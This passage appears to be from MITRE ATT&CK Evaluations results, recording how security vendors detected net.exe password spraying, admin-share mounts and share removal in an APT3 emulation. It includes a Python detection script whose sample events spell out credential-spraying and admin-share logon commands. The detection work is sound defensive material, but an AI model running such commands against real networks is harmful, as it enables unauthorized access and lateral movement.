OverWatch generated a General Behavior alert indicating the successful net use connection to ADMIN$ was suspicious. The alert was tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for net.exe attempting to mount an administrative share. The alert was tagged with the correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched net.exe connection events with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement) (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
Specific Behavior (Tainted)
A Specific Behavior alert was triggered for each individual net.exe connection with a tag titled Lateral Movement via "Mounting Hidden Shares" (tainted by parent PowerShell alert). [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed a logon attempt targeting ADMIN$ via net.exe and command-line arguments. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
FireEye
Enrichment
The capability enriched a logon attempt via net.exe with an alert for Net Use Command Execution (Weak Signal). The alert details showed net.exe with command-line arguments targeting ADMIN$ using valid credentials for user Kmitnick. The alert was also tagged with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement). [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker accessed Conficker by mounting the ADMIN$ share. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
F-Secure
Specific Behavior
Specific Behavior alerts were generated for net.exe connecting to a remote administrative share. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior
A General Behavior alert was generated showing that a spawned process (net) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed repeated logon attempts targeting ADMIN$ via net.exe and command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
GoSecure
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments targeting ADMIN$ using valid credentials for user Kmitnick. Telemetry also showed explorer.exe (as the user Bob) write a PIPE on Conficker, which could indicate to an analyst that the share had been successfully mounted (tainted by the parent FileExts Registry Key modified alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6] [7]
McAfee
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe to ADMIN$ with command-line arguments to login using the valid credentials of user Kmitnick. The telemetry was tainted by a trace detection on powershell.exe. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for the net utility executed to authenticate to a remote admin share with valid accounts. The alert was tagged with the correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares). [1] [2] [3] [4] [5]
Microsoft
Specific Behavior (Delayed)
A delayed Specific Behavior alert was generated based on a brute force attempt by accessing remote SMB shares with different accounts. The alert spans multiple login attempts. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments targeting ADMIN$ using valid credentials for user Kmitnick (tainted by parent alert on PowerShell script with suspicious content). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) as the local user Kmitnick. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed a logon attempt targeting ADMIN$ via net.exe and command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed a logon attempt targeting ADMIN$ via net.exe and command-line arguments. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). The log files showed an exit code of 0x2, which indicates a logon failure but does not differentiate between bad credentials and access denied to the resource. [1] [2] [3] [4] [5]
Carbon Black
Telemetry
Telemetry showed a process tree containing repeated logon attempts via net.exe and command-line arguments indicative of password spraying, eventually resulting in a successful logon. [1] [2] [3] [4]
Enrichment (Configuration Change)
The capability enriched individual net.exe events with tagging titled "Credential Access using Admin Shares - Failed Attempts" for failures as well as a related ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement) for successful logons. The capability was modified after the start of the evaluation enabling enrichment to appear, so the detection is identified as a configuration change. [1] [2] [3] [4]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally using several accounts. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the successful net use connection was suspicious. The alert was tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments to connect as the user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a parent powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Enrichment (Tainted)
The capability enriched net.exe execution with a related ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The data was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed net.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched net.exe connection events with a related ATT&CK Technique (T1077 - Windows Admin Shares) and Tactics (Execution, Lateral Movement). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
Enrichment (Tainted)
The capability enriched each individual net.exe connection with a tag titled Lateral Movement via "Mounting Hidden Shares" (tainted by parent PowerShell alert). [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying, eventually resulting in a successful logon (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net Use Command Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement). [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed the successful logon for the user Kmitnick. [1] [2] [3] [4] [5] [6] [7] [8]
F-Secure
Enrichment
The capability enriched multiple occurrences of net.exe usage as indicative of brute forcing a remote system as well as the correct ATT&CK Technique ID (Brute Force). Screenshot is not available due to sensitivity of rule logic. [1] [2]
Telemetry
Telemetry showed a logon attempt via net.exe with command-line arguments to connect using the valid credentials of user Kmitnick. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed explorer.exe (as the user Bob) writing a PIPE on Conficker, which could indicate to an analyst that the share had been successfully mounted (tainted by the parent FileExts Registry Key modified alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
Enrichment (Tainted)
The capability enriched a net.exe logon attempt targeting ADMIN$ with the condition "Net User Reconnaissance Command". The enrichment was tainted by the parent "Powershell executed remote commands" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Specific Behavior
A Specific Behavior alert was generated for powershell.exe performing a potential brute force password hack via the net utility. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to login using the valid credentials of user Kmitnick. The telemetry was tainted by a trace detection on powershell.exe. [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe with command-line arguments indicative of password spraying, eventually resulting in a successful logon (tainted by parent alert on PowerShell script with suspicious content). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Specific Behavior (Delayed)
A Specific Behavior alert was generated based on a brute force attempt by accessing remote SMB shares with different accounts. The alert spans multiple login attempts. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) as local user Kmitnick followed by an event for the credentials being validated by the DC. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying, eventually resulting in a successful logon. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying, eventually resulting in a successful logon. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). The log files showed an exit code of 0x2 which indicates a logon failure, but does not differentiate between bad credentials and access denied to resource. [1] [2] [3] [4]
Carbon Black
Telemetry
Telemetry showed a process tree containing net.exe and command-line arguments. [1] [2]
Specific Behavior
A Specific Behavior alert was generated indicating that a connected network share was removed. [1] [2]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because the user Bob removed an artifact for the ADMIN$ share. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments. The telemetry was tainted by a previous powershell.exe detection. [1] [2]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was tainted by a parent PowerShell alert. [1]
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1]
Endgame
Telemetry (Tainted)
Telemetry showed an event tree containing net.exe and command-line arguments (tainted by parent PowerShell alert). [1]
FireEye
Telemetry
Telemetry showed net.exe executing with command-line arguments. [1] [2]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker unmounted the share from CodeRed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2]
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments (tainted by the parent "Powershell executed remote commands" alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on powershell.exe. [1] [2]
Specific Behavior
A Specific Behavior alert was generated for the net utility removing a shared connection via PowerShell. The alert was tagged with the correct ATT&CK Tactic (Defense Evasion) and Technique (Network Share Connection Removal). [1] [2]
Microsoft
Telemetry (Tainted)
Telemetry showed net.exe with command-line arguments (tainted by parent alert on PowerShell script with suspicious content). [1] [2]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2]
Enrichment
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Connection Removal). [1] [2]
RSA
Telemetry
Telemetry showed net.exe execution and command-line arguments. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of net.exe and command-line arguments. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1]
Carbon Black
Telemetry
Telemetry showed a process tree containing a logon attempt via net.exe and command-line arguments targeting C$ using valid account credentials. [1] [2] [3] [4] [5] [6]
Specific Behavior
Specific Behavior alerts were generated mapped to the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement) for successful logons. [1] [2] [3] [4] [5] [6]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to the C$ share on 10.0.0.4 (Creeper) as the user Kmitnick. The telemetry was tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Specific Behavior (Tainted)
A Specific Behavior alert was generated for net.exe attempting to mount an administrative share. The alert was tagged with the correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Specific Behavior (Tainted)
A Specific Behavior alert was triggered for each individual net.exe connection with a tag titled Lateral Movement via "Mounting Hidden Shares" (tainted by parent PowerShell alert). The alert was also tagged with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement). [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed logon attempt targeting C$ via net.exe and command-line arguments. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
Enrichment (Delayed, Tainted)
The capability enriched net.exe connection events with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement) (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker mounted the C$ drive on creeper with the kmitnick account. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched net1.exe with an alert for Net Use Command Execution (Weak Signal). The alert also was tagged with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement). [1] [2] [3] [4] [5] [6] [7] [8]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed a logon attempt via net.exe with command-line arguments targeting C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick. [1] [2] [3] [4] [5] [6] [7] [8]
GoSecure
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments targeting C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6] [7]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on powershell.exe. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for the net utility executed to authenticate to a remote admin share with valid accounts. The alert was tagged with the correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares). [1] [2] [3] [4] [5]
Microsoft
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments targeting C$ using valid credentials for user Kmitnick (tainted by parent alert on PowerShell script with suspicious content). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed a net.exe logon attempt to C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed a logon attempt via net.exe and command-line arguments targeting C$. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe and command-line arguments targeting C$. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
Carbon Black
Telemetry
Telemetry showed a process tree containing a logon attempt via net.exe and command-line arguments using valid account credentials. [1] [2] [3] [4] [5]
CrowdStrike
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to the C$ share on Creeper as the user Kmitnick. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was tainted by a parent PowerShell alert. [1] [2] [3]
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3]
Endgame
Enrichment (Tainted)
The capability enriched the net.exe connection (using valid credentials for Kmitnick) with a tag titled Lateral Movement via "Mounting Hidden Shares" (tainted by parent PowerShell alert). [1] [2] [3] [4] [5]
Enrichment (Delayed, Tainted)
The capability enriched net.exe connection events with a related ATT&CK Technique (T1077 - Windows Admin Shares) and Tactics (Execution, Lateral Movement) (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe and command-line arguments using valid credentials for user Kmitnick (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker mounted the C$ drive on creeper with the kmitnick account. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched a logon attempt via net1.exe using valid credentials for user Kmitnick with an alert for Net Use Command Execution (Weak Signal). The password for the user Kmitnick was redacted by the capability. The vendor indicated the un-redacted passwords could be observed in triage/acquisition data. [1] [2] [3] [4] [5] [6]
F-Secure
Enrichment
The capability enriched the net.exe connection using valid credentials of Kmitnick with an alert for possible lateral movement. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed a logon attempt via net.exe with command-line arguments targeting C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick. Telemetry also showed a logon event for user Kmitnick on Creeper (10.0.0.4). [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments targeting C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on powershell.exe. [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments targeting C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick (tainted by parent alert on PowerShell script with suspicious content). Telemetry also showed that the logon event for Kmitnick on Creeper was successful. [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed a net.exe logon attempt to C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick followed by an event for a successful login. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed a process tree containing a logon attempt via net.exe and command-line arguments using valid credentials of user Kmitnick. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe and command-line arguments using valid credentials of user Kmitnick. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4]
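The net.exe entries above (credential guessing against \\Conficker\ADMIN$, the later `net use /delete`, and the valid-credential mounts of \\Creeper\C$ as Kmitnick) record what each vendor surfaced, not the logic that would surface it. What follows is an added example, not code from this page or from any vendor evaluated on it: a Python parser for `net use` command lines with three rules (admin-share mount with explicit credentials, share removal, and credential spraying) run over constructed Sysmon-style process-creation events. The event field names ts/host/user/cmdline/rc are assumptions, usernames other than Bob and Kmitnick and every password are constructed, and tokenisation is a plain whitespace split. The parser also masks the positional password before the command line is stored, the redaction behaviour noted in FireEye's entry above.

```python
"""Rules for net.exe share activity over constructed process-creation events (added example,
not code from the ATT&CK Evaluations page or any vendor on it). Event fields ts/host/user/
cmdline/rc are assumptions (Sysmon-style process creation plus exit code); hosts and the users
Bob/Kmitnick follow the evaluation text, all other usernames and every password are constructed."""
import re
from collections import defaultdict

NET_IMAGES = {"net", "net.exe", "net1", "net1.exe"}        # net.exe hands most verbs to net1.exe
ADMIN_SHARES = {"ADMIN$", "C$", "D$", "IPC$"}
UNC_RE = re.compile(r"^\\\\(?P<host>[^\\]+)\\(?P<share>[^\\]+)")
DRIVE_RE = re.compile(r"^[A-Za-z]:$")


def parse_net_use(cmdline):
    """Split `net use` into host, share, user, positional password and action; None if not net use.
    Tokenisation is a plain whitespace split (assumption: no quoted arguments containing spaces)."""
    tokens = cmdline.split()
    if len(tokens) < 2 or tokens[0].strip('"').rsplit("\\", 1)[-1].lower() not in NET_IMAGES:
        return None
    if tokens[1].lower() != "use":
        return None
    p = {"action": "mount", "host": None, "share": None, "user": None,
         "password": None, "password_index": None, "device": None}
    for idx, tok in enumerate(tokens[2:], start=2):
        low = tok.lower()
        if low in ("/delete", "/del", "/d"):
            p["action"] = "unmount"
        elif low.startswith("/user:"):
            p["user"] = tok[len("/user:"):]
        elif low.startswith("/"):
            continue                                         # e.g. /persistent:no
        elif DRIVE_RE.match(tok) and p["device"] is None:
            p["device"] = tok.upper()
        elif tok.startswith("\\\\") and p["host"] is None:
            m = UNC_RE.match(tok)
            if m:
                p["host"], p["share"] = m.group("host"), m.group("share").upper()
        elif tok != "*" and p["password"] is None:           # "*" makes net prompt instead
            p["password"], p["password_index"] = tok, idx
    p["admin_share"] = p["share"] in ADMIN_SHARES
    return p


def redact_password(cmdline):
    """Mask the positional password, as a sensor should before it stores the command line."""
    p = parse_net_use(cmdline)
    if p is None or p["password_index"] is None:
        return cmdline
    tokens = cmdline.split()
    tokens[p["password_index"]] = "<redacted>"
    return " ".join(tokens)


def analyse(events, window=300, spray_threshold=3):
    """Alerts for admin-share mounts, share removal, and credential spraying: >= spray_threshold
    credentialed attempts from one source host at one target within `window` seconds using
    >= 2 distinct credentials; the spray alert notes whether any attempt exited 0 (success)."""
    alerts = []
    attempts = defaultdict(list)      # (source host, target host) -> [(ts, user, pw, rc)]
    for ev in events:
        p = parse_net_use(ev["cmdline"])
        if p is None:
            continue
        base = {"ts": ev["ts"], "source": ev["host"], "actor": ev["user"],
                "cmdline": redact_password(ev["cmdline"])}
        if p["action"] == "unmount":
            alerts.append(dict(base, rule="share_unmount", target=p["host"],
                               share=p["share"], device=p["device"]))
            continue
        if p["admin_share"] and p["user"]:
            alerts.append(dict(base, rule="admin_share_mount", target=p["host"], share=p["share"],
                               as_user=p["user"], success=ev.get("rc") == 0))
        if p["host"] and p["password"] is not None:
            attempts[(ev["host"], p["host"])].append((ev["ts"], p["user"], p["password"], ev.get("rc")))
    for (src, dst), tries in attempts.items():
        tries.sort(key=lambda t: t[0])
        for i in range(len(tries)):
            burst = [t for t in tries[i:] if t[0] - tries[i][0] <= window]
            creds = {(u, pw) for _, u, pw, _ in burst}
            if len(burst) >= spray_threshold and len(creds) >= 2:
                alerts.append({"rule": "password_spray", "source": src, "target": dst,
                               "attempts": len(burst), "distinct_credentials": len(creds),
                               "succeeded": any(rc == 0 for *_, rc in burst),
                               "first_ts": burst[0][0], "last_ts": burst[-1][0]})
                break                                        # one alert per source/target pair
    return alerts


SAMPLE_EVENTS = [   # constructed sample mirroring the evaluation: spray ADMIN$, unmount, mount C$
    {"ts": 0, "host": "CodeRed", "user": "Bob", "rc": 2, "cmdline": r"net use \\10.0.0.5\ADMIN$ /user:Administrator Autumn2018!"},
    {"ts": 4, "host": "CodeRed", "user": "Bob", "rc": 2, "cmdline": r"net use \\10.0.0.5\ADMIN$ /user:Backup Autumn2018!"},
    {"ts": 9, "host": "CodeRed", "user": "Bob", "rc": 0, "cmdline": r"net use \\10.0.0.5\ADMIN$ /user:Kmitnick Autumn2018!"},
    {"ts": 30, "host": "CodeRed", "user": "Bob", "rc": 0, "cmdline": r"net use \\10.0.0.5\ADMIN$ /delete"},
    {"ts": 60, "host": "CodeRed", "user": "Bob", "rc": 0, "cmdline": r"C:\Windows\System32\net1.exe use \\10.0.0.4\C$ /user:Kmitnick Autumn2018!"},
    {"ts": 80, "host": "CodeRed", "user": "Bob", "rc": 0, "cmdline": r"sc \\10.0.0.4 query"},   # not net.exe, ignored
]
```

The spray rule only treats exit code 0 as success and makes no claim about why an attempt failed: as SentinelOne's entry notes, the non-zero code does not separate bad credentials from access denied, so failure classification has to come from the target's logon events, not from net.exe.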
Carbon Black
Telemetry
Telemetry showed file modification events for the creation of, and writes to, autoupdate.vbs. [1] [2] [3] [4]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because a .vbs was written to the filesystem, which was likely used to carry out additional actions. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed File Write and New Script Write events for autoupdate.vbs under powershell.exe. The telemetry was tainted by a previous detection. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry (Tainted)
Telemetry showed the file write of autoupdate.vbs. The telemetry was tainted by a parent PowerShell alert listed as the owner process. [1] [2] [3] [4] [5] [6] [7]
Endgame
Telemetry (Tainted)
Telemetry showed creation of autoupdate.vbs (tainted by parent PowerShell alert). [1] [2] [3] [4]
FireEye
Enrichment
The capability enriched powershell.exe writing autoupdate.vbs with an alert for PowerShell File Write (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and Tactics (Command and Control, Lateral Movement). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
Telemetry
Telemetry showed the file creation of autoupdate.vbs. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe creating autoupdate.vbs (tainted by parent Powershell executed remote commands alerts). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Enrichment
The capability enriched powershell.exe with the correct ATT&CK Tactic (Command and Control) and Technique (Remote File Copy) and a suspicious indicator that a file was copied to a remote computer via PowerShell. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed the creation of autoupdate.vbs on Code Red (10.0.1.5). [1] [2] [3] [4] [5] [6] [7] [8]
Microsoft
Telemetry (Tainted)
Telemetry showed powershell.exe creating autoupdate.vbs (tainted by parent alert on PowerShell script with suspicious content). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Palo Alto Networks
Telemetry
Telemetry showed file create and write events for autoupdate.vbs. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
RSA
Telemetry
Telemetry showed file write of autoupdate.vbs. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed creation and file write events for autoupdate.vbs. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6]
Carbon Black
Telemetry
Telemetry showed a process tree with cmd.exe execution and associated user context change. [1] [2] [3]
Enrichment
The capability enriched cmd.exe event data with the correct ATT&CK Technique (T1059 - Command-Line Interface). [1] [2] [3]
CrowdStrike
Telemetry (Tainted)
Telemetry showed a new cmd.exe process running wscript.exe as user Kmitnick, which then launched powershell.exe. The command line arguments for cmd.exe showed that autoupdate.vbs was run. The telemetry was tainted by a previous detection. [1] [2]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe executing autoupdate.vbs through wscript.exe. The telemetry was tainted by a parent PowerShell alert based on a malicious Invoke-RunAs command. [1] [2]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched the execution of autoupdate.vbs with a related ATT&CK Technique (T1064 - Scripting) and Tactic (Execution) (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3]
Enrichment (Tainted)
The capability enriched events related to cmd.exe launching PowerShell via wscript.exe running autoupdate.vbs (tainted by parent PowerShell alert). [1] [2] [3]
Telemetry (Tainted)
